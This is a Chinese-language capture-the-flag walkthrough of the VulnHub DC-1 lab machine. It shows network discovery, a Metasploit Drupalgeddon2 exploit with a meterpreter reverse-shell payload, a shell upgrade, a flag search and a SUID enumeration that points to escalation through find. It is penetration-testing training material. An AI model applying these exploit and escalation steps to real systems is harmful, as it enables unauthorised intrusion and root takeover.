靶机Vulnhub:DC1
靶机和环境准备:
宿主机:kaili
dc1靶机下载:DC: 1 ~ VulnHub
主机发现:
arp-scan -l
发现靶机ip地址192.168.3.76
信息收集:
nmap -A -sV 192.168.3.76发现是靶机开启了22,80,111这三个端口,http服务上搭建cms:drupal 版本是7
发现并利用漏洞
使用工具:msfconsole
加载payload
msf6 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
设置参数并进行漏洞利用
为了方便做个回显
python -c 'import pty;pty.spawn("/bin/bash")'\;
查找flag.txt,发现有个flag4查看其内容
www-data@DC-1:/var/www$ find / | grep flag
find / | grep flag
/home/flag4
/home/flag4/.bash_logout
/home/flag4/.profile
/home/flag4/flag4.txt
/home/flag4/.bash_history
/home/flag4/.bashrc
/var/www/flag1.txt内容如下:(似乎好像没啥用)
www-data@DC-1:/var/www$ cat /home/flag4/flag4.txt
cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
SUID提权:
继续正常步骤使用,发现flag4的提示中有个find这里有root权限的也有find是不是能用find提权呢?
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/nullwww-data@DC-1:/var/www$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
<d / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs
还真是能用find继续提权
查看最后的flag.txt
总结:
1.dc1这个靶机难度比较简单入门级别,适合新手刷,能熟悉渗透的流程
2.信息收集对整个渗透过程来说尤其重要,端口扫描和网站指纹的收集
3.msfconsole 的熟悉使用,对漏洞的查找和利用有一点的要求
4.了解suid提权的find提权的使用
版权声明:本文为weixin_51566481原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。